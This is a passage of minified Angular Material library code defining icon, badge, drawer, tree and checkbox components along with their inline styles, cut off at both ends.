i=this._location.getPathname();i!==this._previousPath&&(this._previousPath=i,this._prependPathToReferences(i))}}ngOnDestroy(){this._currentIconFetch.unsubscribe(),this._elementsWithExternalReferences&&this._elementsWithExternalReferences.clear()}_usingFontIcon(){return!this.svgIcon}_setSvgElement(e){this._clearSvgElement();const i=this._location.getPathname();this._previousPath=i,this._cacheChildrenWithExternalReferences(e),this._prependPathToReferences(i),this._elementRef.nativeElement.appendChild(e)}_clearSvgElement(){const e=this._elementRef.nativeElement;let i=e.childNodes.length;for(this._elementsWithExternalReferences&&this._elementsWithExternalReferences.clear();i--;){const n=e.childNodes[i];(1!==n.nodeType||"svg"===n.nodeName.toLowerCase())&&n.remove()}}_updateFontIconClasses(){if(!this._usingFontIcon())return;const e=this._elementRef.nativeElement,i=(this.fontSet?this._iconRegistry.classNameForFontAlias(this.fontSet).split(/ +/):this._iconRegistry.getDefaultFontSetClass()).filter(n=>n.length>0);this._previousFontSetClass.forEach(n=>e.classList.remove(n)),i.forEach(n=>e.classList.add(n)),this._previousFontSetClass=i,this.fontIcon!==this._previousFontIconClass&&!i.includes("mat-ligature-font")&&(this._previousFontIconClass&&e.classList.remove(this._previousFontIconClass),this.fontIcon&&e.classList.add(this.fontIcon),this._previousFontIconClass=this.fontIcon)}_cleanupFontValue(e){return"string"==typeof e?e.trim().split(" ")[0]:e}_prependPathToReferences(e){const i=this._elementsWithExternalReferences;i&&i.forEach((n,r)=>{n.forEach(c=>{r.setAttribute(c.name,`url('${e}#${c.value}')`)})})}_cacheChildrenWithExternalReferences(e){const i=e.querySelectorAll(t_e),n=this._elementsWithExternalReferences=this._elementsWithExternalReferences||new Map;for(let r=0;r{const d=i[r],T=d.getAttribute(c),k=T?T.match(i_e):null;if(k){let q=n.get(d);q||(q=[],n.set(d,q)),q.push({name:c,value:k[1]})}})}_updateSvgIcon(e){if(this._svgNamespace=null,this._svgName=null,this._currentIconFetch.unsubscribe(),e){const[i,n]=this._splitIconName(e);i&&(this._svgNamespace=i),n&&(this._svgName=n),this._currentIconFetch=this._iconRegistry.getNamedSvgIcon(n,i).pipe(Cn(1)).subscribe(r=>this._setSvgElement(r),r=>{this._errorHandler.handleError(new Error(`Error retrieving icon ${i}:${n}! ${r.message}`))})}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(K3),Vr("aria-hidden"),Ee(Zpe),Ee(yh),Ee(Jpe,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-icon"]],hostAttrs:["role","img",1,"mat-icon","notranslate"],hostVars:8,hostBindings:function(e,i){2&e&&(Rt("data-mat-icon-type",i._usingFontIcon()?"font":"svg")("data-mat-icon-name",i._svgName||i.fontIcon)("data-mat-icon-namespace",i._svgNamespace||i.fontSet)("fontIcon",i._usingFontIcon()?i.fontIcon:null),Ct("mat-icon-inline",i.inline)("mat-icon-no-color","primary"!==i.color&&"accent"!==i.color&&"warn"!==i.color))},inputs:{color:"color",inline:"inline",svgIcon:"svgIcon",fontSet:"fontSet",fontIcon:"fontIcon"},exportAs:["matIcon"],features:[ci],ngContentSelectors:jpe,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},styles:[".mat-icon{-webkit-user-select:none;user-select:none;background-repeat:no-repeat;display:inline-block;fill:currentColor;height:24px;width:24px;overflow:hidden}.mat-icon.mat-icon-inline{font-size:inherit;height:inherit;line-height:inherit;width:inherit}.mat-icon.mat-ligature-font[fontIcon]::before{content:attr(fontIcon)}[dir=rtl] .mat-icon-rtl-mirror{transform:scale(-1, 1)}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon{display:block}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon-button .mat-icon,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon-button .mat-icon{margin:auto}"],encapsulation:2,changeDetection:0}),t})(),ib=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})(),a_e=0;const n_e=Zc(class{}),LW="mat-badge-content";let Hh=(()=>{class t extends n_e{constructor(e,i,n,r,c){super(),this._ngZone=e,this._elementRef=i,this._ariaDescriber=n,this._renderer=r,this._animationMode=c,this._color="primary",this._overlap=!0,this.position="above after",this.size="medium",this._id=a_e++,this._isInitialized=!1}get color(){return this._color}set color(e){this._setColor(e),this._color=e}get overlap(){return this._overlap}set overlap(e){this._overlap=wi(e)}get content(){return this._content}set content(e){this._updateRenderedContent(e)}get description(){return this._description}set description(e){this._updateHostAriaDescription(e)}get hidden(){return this._hidden}set hidden(e){this._hidden=wi(e)}isAbove(){return-1===this.position.indexOf("below")}isAfter(){return-1===this.position.indexOf("before")}getBadgeElement(){return this._badgeElement}ngOnInit(){this._clearExistingBadges(),this.content&&!this._badgeElement&&(this._badgeElement=this._createBadgeElement(),this._updateRenderedContent(this.content)),this._isInitialized=!0}ngOnDestroy(){this._renderer.destroyNode&&this._renderer.destroyNode(this._badgeElement),this._ariaDescriber.removeDescription(this._elementRef.nativeElement,this.description)}_createBadgeElement(){const e=this._renderer.createElement("span"),i="mat-badge-active";return e.setAttribute("id",`mat-badge-content-${this._id}`),e.setAttribute("aria-hidden","true"),e.classList.add(LW),"NoopAnimations"===this._animationMode&&e.classList.add("_mat-animation-noopable"),this._elementRef.nativeElement.appendChild(e),"function"==typeof requestAnimationFrame&&"NoopAnimations"!==this._animationMode?this._ngZone.runOutsideAngular(()=>{requestAnimationFrame(()=>{e.classList.add(i)})}):e.classList.add(i),e}_updateRenderedContent(e){const i=`${null!=e?e:""}`.trim();this._isInitialized&&i&&!this._badgeElement&&(this._badgeElement=this._createBadgeElement()),this._badgeElement&&(this._badgeElement.textContent=i),this._content=i}_updateHostAriaDescription(e){this._ariaDescriber.removeDescription(this._elementRef.nativeElement,this.description),e&&this._ariaDescriber.describe(this._elementRef.nativeElement,e),this._description=e}_setColor(e){const i=this._elementRef.nativeElement.classList;i.remove(`mat-badge-${this._color}`),e&&i.add(`mat-badge-${e}`)}_clearExistingBadges(){const e=this._elementRef.nativeElement.querySelectorAll(`:scope > .${LW}`);for(const i of Array.from(e))i!==this._badgeElement&&i.remove()}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(Pw),Ee(wr),Ee(ar,8))},t.\u0275dir=Ot({type:t,selectors:[["","matBadge",""]],hostAttrs:[1,"mat-badge"],hostVars:20,hostBindings:function(e,i){2&e&&Ct("mat-badge-overlap",i.overlap)("mat-badge-above",i.isAbove())("mat-badge-below",!i.isAbove())("mat-badge-before",!i.isAfter())("mat-badge-after",i.isAfter())("mat-badge-small","small"===i.size)("mat-badge-medium","medium"===i.size)("mat-badge-large","large"===i.size)("mat-badge-hidden",i.hidden||!i.content)("mat-badge-disabled",i.disabled)},inputs:{disabled:["matBadgeDisabled","disabled"],color:["matBadgeColor","color"],overlap:["matBadgeOverlap","overlap"],position:["matBadgePosition","position"],content:["matBadge","content"],description:["matBadgeDescription","description"],size:["matBadgeSize","size"],hidden:["matBadgeHidden","hidden"]},features:[ci]}),t})(),zW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Xy,la,la]}),t})();const WW=["*"],o_e=["content"];function r_e(t,a){if(1&t){const e=Ye();m(0,"div",2),he("click",function(){return be(e),Me(V()._onBackdropClicked())}),u()}2&t&&Ct("mat-drawer-shown",V()._isShowingBackdrop())}function s_e(t,a){1&t&&(m(0,"mat-drawer-content"),va(1,2),u())}const c_e=[[["mat-drawer"]],[["mat-drawer-content"]],"*"],l_e=["mat-drawer","mat-drawer-content","*"],d_e={transformDrawer:nr("transform",[sn("open, open-instant",zi({transform:"none",visibility:"visible"})),sn("void",zi({"box-shadow":"none",visibility:"hidden"})),gn("void => open-instant",En("0ms")),gn("void <=> open, open-instant => void",En("400ms cubic-bezier(0.25, 0.8, 0.25, 1)"))])},m_e=new ni("MAT_DRAWER_DEFAULT_AUTOSIZE",{providedIn:"root",factory:function u_e(){return!1}}),FW=new ni("MAT_DRAWER_CONTAINER");let Nd=(()=>{class t extends uw{constructor(e,i,n,r,c){super(n,r,c),this._changeDetectorRef=e,this._container=i}ngAfterContentInit(){this._container._contentMarginChanges.subscribe(()=>{this._changeDetectorRef.markForCheck()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(ja(()=>gu)),Ee(mi),Ee(By),Ee(qi))},t.\u0275cmp=Wt({type:t,selectors:[["mat-drawer-content"]],hostAttrs:[1,"mat-drawer-content"],hostVars:4,hostBindings:function(e,i){2&e&&ri("margin-left",i._container._contentMargins.left,"px")("margin-right",i._container._contentMargins.right,"px")},features:[ki([{provide:uw,useExisting:t}]),ci],ngContentSelectors:WW,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},encapsulation:2,changeDetection:0}),t})(),_u=(()=>{class t{constructor(e,i,n,r,c,d,T,k){this._elementRef=e,this._focusTrapFactory=i,this._focusMonitor=n,this._platform=r,this._ngZone=c,this._interactivityChecker=d,this._doc=T,this._container=k,this._elementFocusedBeforeDrawerWasOpened=null,this._enableAnimations=!1,this._position="start",this._mode="over",this._disableClose=!1,this._opened=!1,this._animationStarted=new J,this._animationEnd=new J,this._animationState="void",this.openedChange=new Tt(!0),this._openedStream=this.openedChange.pipe(Dn(q=>q),Xe(()=>{})),this.openedStart=this._animationStarted.pipe(Dn(q=>q.fromState!==q.toState&&0===q.toState.indexOf("open")),H4(void 0)),this._closedStream=this.openedChange.pipe(Dn(q=>!q),Xe(()=>{})),this.closedStart=this._animationStarted.pipe(Dn(q=>q.fromState!==q.toState&&"void"===q.toState),H4(void 0)),this._destroyed=new J,this.onPositionChanged=new Tt,this._modeChanged=new J,this.openedChange.subscribe(q=>{q?(this._doc&&(this._elementFocusedBeforeDrawerWasOpened=this._doc.activeElement),this._takeFocus()):this._isFocusWithinDrawer()&&this._restoreFocus(this._openedVia||"program")}),this._ngZone.runOutsideAngular(()=>{Tc(this._elementRef.nativeElement,"keydown").pipe(Dn(q=>27===q.keyCode&&!this.disableClose&&!es(q)),ea(this._destroyed)).subscribe(q=>this._ngZone.run(()=>{this.close(),q.stopPropagation(),q.preventDefault()}))}),this._animationEnd.pipe(Bh((q,Y)=>q.fromState===Y.fromState&&q.toState===Y.toState)).subscribe(q=>{const{fromState:Y,toState:te}=q;(0===te.indexOf("open")&&"void"===Y||"void"===te&&0===Y.indexOf("open"))&&this.openedChange.emit(this._opened)})}get position(){return this._position}set position(e){(e="end"===e?"end":"start")!==this._position&&(this._isAttached&&this._updatePositionInParent(e),this._position=e,this.onPositionChanged.emit())}get mode(){return this._mode}set mode(e){this._mode=e,this._updateFocusTrapState(),this._modeChanged.next()}get disableClose(){return this._disableClose}set disableClose(e){this._disableClose=wi(e)}get autoFocus(){const e=this._autoFocus;return null==e?"side"===this.mode?"dialog":"first-tabbable":e}set autoFocus(e){("true"===e||"false"===e||null==e)&&(e=wi(e)),this._autoFocus=e}get opened(){return this._opened}set opened(e){this.toggle(wi(e))}_forceFocus(e,i){this._interactivityChecker.isFocusable(e)||(e.tabIndex=-1,this._ngZone.runOutsideAngular(()=>{const n=()=>{e.removeEventListener("blur",n),e.removeEventListener("mousedown",n),e.removeAttribute("tabindex")};e.addEventListener("blur",n),e.addEventListener("mousedown",n)})),e.focus(i)}_focusByCssSelector(e,i){let n=this._elementRef.nativeElement.querySelector(e);n&&this._forceFocus(n,i)}_takeFocus(){if(!this._focusTrap)return;const e=this._elementRef.nativeElement;switch(this.autoFocus){case!1:case"dialog":return;case!0:case"first-tabbable":this._focusTrap.focusInitialElementWhenReady().then(i=>{!i&&"function"==typeof this._elementRef.nativeElement.focus&&e.focus()});break;case"first-heading":this._focusByCssSelector('h1, h2, h3, h4, h5, h6, [role="heading"]');break;default:this._focusByCssSelector(this.autoFocus)}}_restoreFocus(e){"dialog"!==this.autoFocus&&(this._elementFocusedBeforeDrawerWasOpened?this._focusMonitor.focusVia(this._elementFocusedBeforeDrawerWasOpened,e):this._elementRef.nativeElement.blur(),this._elementFocusedBeforeDrawerWasOpened=null)}_isFocusWithinDrawer(){const e=this._doc.activeElement;return!!e&&this._elementRef.nativeElement.contains(e)}ngAfterViewInit(){this._isAttached=!0,this._focusTrap=this._focusTrapFactory.create(this._elementRef.nativeElement),this._updateFocusTrapState(),"end"===this._position&&this._updatePositionInParent("end")}ngAfterContentChecked(){this._platform.isBrowser&&(this._enableAnimations=!0)}ngOnDestroy(){var e;this._focusTrap&&this._focusTrap.destroy(),null===(e=this._anchor)||void 0===e||e.remove(),this._anchor=null,this._animationStarted.complete(),this._animationEnd.complete(),this._modeChanged.complete(),this._destroyed.next(),this._destroyed.complete()}open(e){return this.toggle(!0,e)}close(){return this.toggle(!1)}_closeViaBackdropClick(){return this._setOpen(!1,!0,"mouse")}toggle(e=!this.opened,i){e&&i&&(this._openedVia=i);const n=this._setOpen(e,!e&&this._isFocusWithinDrawer(),this._openedVia||"program");return e||(this._openedVia=null),n}_setOpen(e,i,n){return this._opened=e,e?this._animationState=this._enableAnimations?"open":"open-instant":(this._animationState="void",i&&this._restoreFocus(n)),this._updateFocusTrapState(),new Promise(r=>{this.openedChange.pipe(Cn(1)).subscribe(c=>r(c?"open":"close"))})}_getWidth(){return this._elementRef.nativeElement&&this._elementRef.nativeElement.offsetWidth||0}_updateFocusTrapState(){this._focusTrap&&(this._focusTrap.enabled=this.opened&&"side"!==this.mode)}_updatePositionInParent(e){const i=this._elementRef.nativeElement,n=i.parentNode;"end"===e?(this._anchor||(this._anchor=this._doc.createComment("mat-drawer-anchor"),n.insertBefore(this._anchor,i)),n.appendChild(i)):this._anchor&&this._anchor.parentNode.insertBefore(i,this._anchor)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(js),Ee(cr),Ee(qi),Ee(Ky),Ee(ga,8),Ee(FW,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-drawer"]],viewQuery:function(e,i){if(1&e&&Mi(o_e,5),2&e){let n;Vt(n=Bt())&&(i._content=n.first)}},hostAttrs:["tabIndex","-1",1,"mat-drawer"],hostVars:12,hostBindings:function(e,i){1&e&&GC("@transform.start",function(r){return i._animationStarted.next(r)})("@transform.done",function(r){return i._animationEnd.next(r)}),2&e&&(Rt("align",null),s1("@transform",i._animationState),Ct("mat-drawer-end","end"===i.position)("mat-drawer-over","over"===i.mode)("mat-drawer-push","push"===i.mode)("mat-drawer-side","side"===i.mode)("mat-drawer-opened",i.opened))},inputs:{position:"position",mode:"mode",disableClose:"disableClose",autoFocus:"autoFocus",opened:"opened"},outputs:{openedChange:"openedChange",_openedStream:"opened",openedStart:"openedStart",_closedStream:"closed",closedStart:"closedStart",onPositionChanged:"positionChanged"},exportAs:["matDrawer"],ngContentSelectors:WW,decls:3,vars:0,consts:[["cdkScrollable","",1,"mat-drawer-inner-container"],["content",""]],template:function(e,i){1&e&&(Jn(),m(0,"div",0,1),va(2),u())},dependencies:[uw],encapsulation:2,data:{animation:[d_e.transformDrawer]},changeDetection:0}),t})(),gu=(()=>{class t{constructor(e,i,n,r,c,d=!1,T){this._dir=e,this._element=i,this._ngZone=n,this._changeDetectorRef=r,this._animationMode=T,this._drawers=new Cd,this.backdropClick=new Tt,this._destroyed=new J,this._doCheckSubject=new J,this._contentMargins={left:null,right:null},this._contentMarginChanges=new J,e&&e.change.pipe(ea(this._destroyed)).subscribe(()=>{this._validateDrawers(),this.updateContentMargins()}),c.change().pipe(ea(this._destroyed)).subscribe(()=>this.updateContentMargins()),this._autosize=d}get start(){return this._start}get end(){return this._end}get autosize(){return this._autosize}set autosize(e){this._autosize=wi(e)}get hasBackdrop(){return null==this._backdropOverride?!this._start||"side"!==this._start.mode||!this._end||"side"!==this._end.mode:this._backdropOverride}set hasBackdrop(e){this._backdropOverride=null==e?null:wi(e)}get scrollable(){return this._userContent||this._content}ngAfterContentInit(){this._allDrawers.changes.pipe(Ro(this._allDrawers),ea(this._destroyed)).subscribe(e=>{this._drawers.reset(e.filter(i=>!i._container||i._container===this)),this._drawers.notifyOnChanges()}),this._drawers.changes.pipe(Ro(null)).subscribe(()=>{this._validateDrawers(),this._drawers.forEach(e=>{this._watchDrawerToggle(e),this._watchDrawerPosition(e),this._watchDrawerMode(e)}),(!this._drawers.length||this._isDrawerOpen(this._start)||this._isDrawerOpen(this._end))&&this.updateContentMargins(),this._changeDetectorRef.markForCheck()}),this._ngZone.runOutsideAngular(()=>{this._doCheckSubject.pipe(lp(10),ea(this._destroyed)).subscribe(()=>this.updateContentMargins())})}ngOnDestroy(){this._contentMarginChanges.complete(),this._doCheckSubject.complete(),this._drawers.destroy(),this._destroyed.next(),this._destroyed.complete()}open(){this._drawers.forEach(e=>e.open())}close(){this._drawers.forEach(e=>e.close())}updateContentMargins(){let e=0,i=0;if(this._left&&this._left.opened)if("side"==this._left.mode)e+=this._left._getWidth();else if("push"==this._left.mode){const n=this._left._getWidth();e+=n,i-=n}if(this._right&&this._right.opened)if("side"==this._right.mode)i+=this._right._getWidth();else if("push"==this._right.mode){const n=this._right._getWidth();i+=n,e-=n}e=e||null,i=i||null,(e!==this._contentMargins.left||i!==this._contentMargins.right)&&(this._contentMargins={left:e,right:i},this._ngZone.run(()=>this._contentMarginChanges.next(this._contentMargins)))}ngDoCheck(){this._autosize&&this._isPushed()&&this._ngZone.runOutsideAngular(()=>this._doCheckSubject.next())}_watchDrawerToggle(e){e._animationStarted.pipe(Dn(i=>i.fromState!==i.toState),ea(this._drawers.changes)).subscribe(i=>{"open-instant"!==i.toState&&"NoopAnimations"!==this._animationMode&&this._element.nativeElement.classList.add("mat-drawer-transition"),this.updateContentMargins(),this._changeDetectorRef.markForCheck()}),"side"!==e.mode&&e.openedChange.pipe(ea(this._drawers.changes)).subscribe(()=>this._setContainerClass(e.opened))}_watchDrawerPosition(e){!e||e.onPositionChanged.pipe(ea(this._drawers.changes)).subscribe(()=>{this._ngZone.onMicrotaskEmpty.pipe(Cn(1)).subscribe(()=>{this._validateDrawers()})})}_watchDrawerMode(e){e&&e._modeChanged.pipe(ea(ra(this._drawers.changes,this._destroyed))).subscribe(()=>{this.updateContentMargins(),this._changeDetectorRef.markForCheck()})}_setContainerClass(e){const i=this._element.nativeElement.classList,n="mat-drawer-container-has-open";e?i.add(n):i.remove(n)}_validateDrawers(){this._start=this._end=null,this._drawers.forEach(e=>{"end"==e.position?this._end=e:this._start=e}),this._right=this._left=null,this._dir&&"rtl"===this._dir.value?(this._left=this._end,this._right=this._start):(this._left=this._start,this._right=this._end)}_isPushed(){return this._isDrawerOpen(this._start)&&"over"!=this._start.mode||this._isDrawerOpen(this._end)&&"over"!=this._end.mode}_onBackdropClicked(){this.backdropClick.emit(),this._closeModalDrawersViaBackdrop()}_closeModalDrawersViaBackdrop(){[this._start,this._end].filter(e=>e&&!e.disableClose&&this._canHaveBackdrop(e)).forEach(e=>e._closeViaBackdropClick())}_isShowingBackdrop(){return this._isDrawerOpen(this._start)&&this._canHaveBackdrop(this._start)||this._isDrawerOpen(this._end)&&this._canHaveBackdrop(this._end)}_canHaveBackdrop(e){return"side"!==e.mode||!!this._backdropOverride}_isDrawerOpen(e){return null!=e&&e.opened}}return t.\u0275fac=function(e){return new(e||t)(Ee(Cr,8),Ee(mi),Ee(qi),Ee(Ma),Ee(bm),Ee(m_e),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-drawer-container"]],contentQueries:function(e,i,n){if(1&e&&(fa(n,Nd,5),fa(n,_u,5)),2&e){let r;Vt(r=Bt())&&(i._content=r.first),Vt(r=Bt())&&(i._allDrawers=r)}},viewQuery:function(e,i){if(1&e&&Mi(Nd,5),2&e){let n;Vt(n=Bt())&&(i._userContent=n.first)}},hostAttrs:[1,"mat-drawer-container"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-drawer-container-explicit-backdrop",i._backdropOverride)},inputs:{autosize:"autosize",hasBackdrop:"hasBackdrop"},outputs:{backdropClick:"backdropClick"},exportAs:["matDrawerContainer"],features:[ki([{provide:FW,useExisting:t}])],ngContentSelectors:l_e,decls:4,vars:2,consts:[["class","mat-drawer-backdrop",3,"mat-drawer-shown","click",4,"ngIf"],[4,"ngIf"],[1,"mat-drawer-backdrop",3,"click"]],template:function(e,i){1&e&&(Jn(c_e),ne(0,r_e,1,2,"div",0),va(1),va(2,1),ne(3,s_e,2,0,"mat-drawer-content",1)),2&e&&(F("ngIf",i.hasBackdrop),g(3),F("ngIf",!i._content))},dependencies:[Ri,Nd],styles:['.mat-drawer-container{position:relative;z-index:1;box-sizing:border-box;-webkit-overflow-scrolling:touch;display:block;overflow:hidden}.mat-drawer-container[fullscreen]{top:0;left:0;right:0;bottom:0;position:absolute}.mat-drawer-container[fullscreen].mat-drawer-container-has-open{overflow:hidden}.mat-drawer-container.mat-drawer-container-explicit-backdrop .mat-drawer-side{z-index:3}.mat-drawer-container.ng-animate-disabled .mat-drawer-backdrop,.mat-drawer-container.ng-animate-disabled .mat-drawer-content,.ng-animate-disabled .mat-drawer-container .mat-drawer-backdrop,.ng-animate-disabled .mat-drawer-container .mat-drawer-content{transition:none}.mat-drawer-backdrop{top:0;left:0;right:0;bottom:0;position:absolute;display:block;z-index:3;visibility:hidden}.mat-drawer-backdrop.mat-drawer-shown{visibility:visible}.mat-drawer-transition .mat-drawer-backdrop{transition-duration:400ms;transition-timing-function:cubic-bezier(0.25, 0.8, 0.25, 1);transition-property:background-color,visibility}.cdk-high-contrast-active .mat-drawer-backdrop{opacity:.5}.mat-drawer-content{position:relative;z-index:1;display:block;height:100%;overflow:auto}.mat-drawer-transition .mat-drawer-content{transition-duration:400ms;transition-timing-function:cubic-bezier(0.25, 0.8, 0.25, 1);transition-property:transform,margin-left,margin-right}.mat-drawer{position:relative;z-index:4;display:block;position:absolute;top:0;bottom:0;z-index:3;outline:0;box-sizing:border-box;overflow-y:auto;transform:translate3d(-100%, 0, 0)}.cdk-high-contrast-active .mat-drawer,.cdk-high-contrast-active [dir=rtl] .mat-drawer.mat-drawer-end{border-right:solid 1px currentColor}.cdk-high-contrast-active [dir=rtl] .mat-drawer,.cdk-high-contrast-active .mat-drawer.mat-drawer-end{border-left:solid 1px currentColor;border-right:none}.mat-drawer.mat-drawer-side{z-index:2}.mat-drawer.mat-drawer-end{right:0;transform:translate3d(100%, 0, 0)}[dir=rtl] .mat-drawer{transform:translate3d(100%, 0, 0)}[dir=rtl] .mat-drawer.mat-drawer-end{left:0;right:auto;transform:translate3d(-100%, 0, 0)}.mat-drawer[style*="visibility: hidden"]{display:none}.mat-drawer-inner-container{width:100%;height:100%;overflow:auto;-webkit-overflow-scrolling:touch}.mat-sidenav-fixed{position:fixed}'],encapsulation:2,changeDetection:0}),t})(),VW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,uu,uu,la]}),t})();const h_e=dp(Zc(hu));let Y3=(()=>{class t extends h_e{constructor(e,i,n){super(e,i),this.tabIndex=Number(n)||0}ngOnInit(){super.ngOnInit()}ngOnDestroy(){super.ngOnDestroy()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh),Vr("tabindex"))},t.\u0275dir=Ot({type:t,selectors:[["mat-tree-node"]],hostAttrs:[1,"mat-tree-node"],inputs:{role:"role",disabled:"disabled",tabIndex:"tabIndex"},exportAs:["matTreeNode"],features:[ki([{provide:hu,useExisting:t}]),ci]}),t})(),Kw=(()=>{class t extends k3{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matTreeNodeDef",""]],inputs:{when:["matTreeNodeDefWhen","when"],data:["matTreeNode","data"]},features:[ki([{provide:k3,useExisting:t}]),ci]}),t})(),J3=(()=>{class t extends Tw{constructor(e,i,n,r){super(e,i,n),this._disabled=!1,this.tabIndex=Number(r)||0}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e)}get tabIndex(){return this.disabled?-1:this._tabIndex}set tabIndex(e){this._tabIndex=null!=e?e:0}ngOnInit(){super.ngOnInit()}ngAfterContentInit(){super.ngAfterContentInit()}ngOnDestroy(){super.ngOnDestroy()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh),Ee(yd),Vr("tabindex"))},t.\u0275dir=Ot({type:t,selectors:[["mat-nested-tree-node"]],hostAttrs:[1,"mat-nested-tree-node"],inputs:{role:"role",disabled:"disabled",tabIndex:"tabIndex",node:["matNestedTreeNode","node"]},exportAs:["matNestedTreeNode"],features:[ki([{provide:Tw,useExisting:t},{provide:hu,useExisting:t},{provide:S3,useExisting:t}]),ci]}),t})(),ab=(()=>{class t{constructor(e,i){this.viewContainer=e,this._node=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(S3,8))},t.\u0275dir=Ot({type:t,selectors:[["","matTreeNodeOutlet",""]],features:[ki([{provide:Gy,useExisting:t}])]}),t})(),Xw=(()=>{class t extends zh{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-tree"]],viewQuery:function(e,i){if(1&e&&Mi(ab,7),2&e){let n;Vt(n=Bt())&&(i._nodeOutlet=n.first)}},hostAttrs:["role","tree",1,"mat-tree"],exportAs:["matTree"],features:[ki([{provide:zh,useExisting:t}]),ci],decls:1,vars:0,consts:[["matTreeNodeOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[ab],styles:[".mat-tree{display:block}.mat-tree-node{display:flex;align-items:center;flex:1;word-wrap:break-word}.mat-nested-tree-node{border-bottom-width:0}"],encapsulation:2}),t})(),Yw=(()=>{class t extends Dw{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matTreeNodeToggle",""]],inputs:{recursive:["matTreeNodeToggleRecursive","recursive"]},features:[ki([{provide:Dw,useExisting:t}]),ci]}),t})(),BW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[xw,la,la]}),t})();class HW extends _z{constructor(){super(...arguments),this._data=new zs([])}get data(){return this._data.value}set data(a){this._data.next(a)}connect(a){return ra(a.viewChange,this._data).pipe(Xe(()=>this.data))}disconnect(){}}const p_e=["input"],__e=["label"],g_e=function(t){return{enterDuration:t}},C_e=["*"],y_e=new ni("mat-checkbox-default-options",{providedIn:"root",factory:UW});function UW(){return{color:"accent",clickAction:"check-indeterminate"}}let b_e=0;const qW=UW(),M_e={provide:Ls,useExisting:ja(()=>br),multi:!0};class v_e{}const A_e=dp(Pd(El(Zc(class{constructor(t){this._elementRef=t}}))));let T_e=(()=>{class t extends A_e{constructor(e,i,n,r,c,d,T){super(i),this._changeDetectorRef=n,this._ngZone=r,this._animationMode=d,this._options=T,this.ariaLabel="",this.ariaLabelledby=null,this.labelPosition="after",this.name=null,this.change=new Tt,this.indeterminateChange=new Tt,this._onTouched=()=>{},this._currentAnimationClass="",this._currentCheckState=0,this._controlValueAccessorChangeFn=()=>{},this._checked=!1,this._disabled=!1,this._indeterminate=!1,this._options=this._options||qW,this.color=this.defaultColor=this._options.color||qW.color,this.tabIndex=parseInt(c)||0,this.id=this._uniqueId=`${e}${++b_e}`}get inputId(){return`${this.id||this._uniqueId}-input`}get required(){return this._required}set required(e){this._required=wi(e)}ngAfterViewInit(){this._syncIndeterminate(this._indeterminate)}get checked(){return this._checked}set checked(e){const i=wi(e);i!=this.checked&&(this._checked=i,this._changeDetectorRef.markForCheck())}get disabled(){return this._disabled}set disabled(e){const i=wi(e);i!==this.disabled&&(this._disabled=i,this._changeDetectorRef.markForCheck())}get indeterminate(){return this._indeterminate}set indeterminate(e){const i=e!=this._indeterminate;this._indeterminate=wi(e),i&&(this._transitionCheckState(this._indeterminate?3:this.checked?1:2),this.indeterminateChange.emit(this._indeterminate)),this._syncIndeterminate(this._indeterminate)}_isRippleDisabled(){return this.disableRipple||this.disabled}_onLabelTextChange(){this._changeDetectorRef.detectChanges()}writeValue(e){this.checked=!!e}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e}_getAriaChecked(){return this.checked?"true":this.indeterminate?"mixed":"false"}_transitionCheckState(e){let i=this._currentCheckState,n=this._getAnimationTargetElement();if(i!==e&&n&&(this._currentAnimationClass&&n.classList.remove(this._currentAnimationClass),this._currentAnimationClass=this._getAnimationClassForCheckStateTransition(i,e),this._currentCheckState=e,this._currentAnimationClass.length>0)){n.classList.add(this._currentAnimationClass);const r=this._currentAnimationClass;this._ngZone.runOutsideAngular(()=>{setTimeout(()=>{n.classList.remove(r)},1e3)})}}_emitChangeEvent(){this._controlValueAccessorChangeFn(this.checked),this.change.emit(this._createChangeEvent(this.checked)),this._inputElement&&(this._inputElement.nativeElement.checked=this.checked)}toggle(){this.checked=!this.checked,this._controlValueAccessorChangeFn(this.checked)}_handleInputClick(){var e;const i=null===(e=this._options)||void 0===e?void 